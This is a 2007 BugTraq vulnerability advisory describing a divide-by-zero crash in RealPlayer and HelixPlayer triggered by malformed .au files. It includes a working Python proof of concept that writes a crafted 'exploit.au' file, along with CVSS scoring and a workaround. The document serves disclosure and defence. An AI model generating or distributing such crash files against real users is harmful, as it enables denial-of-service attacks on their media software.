BugTraq
RealPlayer/HelixPlayer .au Divide-By-Zero Denial of Service Vulnerability Sep 11 2007 09:31AM
OS2A BTO (os2a bto gmail com)
Advisory attached.

OS2A
RealPlayer/HelixPlayer .au Divide-By-Zero Denial of Service Vulnerability

OS2A ID: OS2A_1010 08/21/2007 Issue Discovered

08/31/2007 Vendor Notification

Class: Denial of Service Severity: High

Overview:

-------------

RealPlayer/Helix Player is a media player that will play popular media formats

as well as organize your music and videos.

Description:

--------------

A Denial of Service flaw exists in RealPlayer and HelixPlayer, when a user

tries to open a malformed .au file. The flaw is due to a Division by Zero error

when processing a malformed AU file.

An attacker must entice an unsuspecting user to open a maliciously crafted AU

file.

Impact:

--------

Successful exploitation allows an attacker to crash a vulnerable application

via a specially crafted file. (Deny the service).

Affected Software(s):

---------------------

Realplayer 10.1.0.3114 and prior

Helixplayer

Tested on :

- RealPlayer-10.1.0.3114

- Realplayer-10.0.9

- Realplayer-10.0.8 on FC6, RH9, RHEL and SuSE respectively

- Realplayer10-5Gold on Windows XP

- HelixPlayer-1.0.6.778 on FC6

AV MP3 Player and Media Player Classic are also found to be vulnerable

Affected Platform:

------------------

Microsoft Windows (All Platform)

RedHat Linux

Fedora Core Linux

SuSE Linux

Proof of Concept:

------------------

The following Python program will generate a malformed .au file

import sys

import os

head = ("\x2E\x73\x6E\x64\x00\x00\x01\x18\x02\x01\x42\xDC\x00\x00\x00\x01"+

"\x02\x02\x1F\x40\x00\x00\x00\x00\x00" +

"\x31\x00\x00\x00\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

"\x00\x00\x00\x00\x00\x00\x00\x00\x66\x66\x66\x00")

print "[x] RealPlayer/Helix Player/Kaboodle Player DoS"

try:

f = open("exploit.au",'w')

except IOError, e:

print "Unable to open file ", e

sys.exit(0)

print "[x] File successfully opened for writing."

try:

f.write(head)

except IOError, e:

print "Unable to write to file ", e

sys.exit(0)

print "[x] File successfully written."

f.close()

print "[x] Open exploit.au with RealPlayer/Helix/Kaboodle Players."

#End of program

RealPlayer crashes with the following exception,

Floating point exception$REALPLAYBIN "$@"

CVSS Score Report:

------------------

ACCESS_VECTOR = NETWORK

ACCESS_COMPLEXITY = MEDIUM

AUTHENTICATION = NOT_REQUIRED

CONFIDENTIALITY_IMPACT = NONE

INTEGRITY_IMPACT = NONE

AVAILABILITY_IMPACT = COMPLETE

EXPLOITABILITY = PROOF_OF_CONCEPT

REMEDIATION_LEVEL = UNAVAILABLE

REPORT_CONFIDENCE = CONFIRMED

CVSS Base Score = 7.1 (AV:N/AC:M/Au:NR/C:N/I:N/A:C)

CVSS Temporal Score = 6.4

Risk factor = High

Reference:

-----------

A similar attack was found recently against Windows Media Player,

http://www.safehack.com/exp/mp/mplayer11.txt

Solution/Work Around:

--------------------

Do not open untrusted .au files.

Credits:

--------

Nagendra Kumar G, Chandan S and Arun Kethipelly of OS2A have been credited with the discovery of this

vulnerability.

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus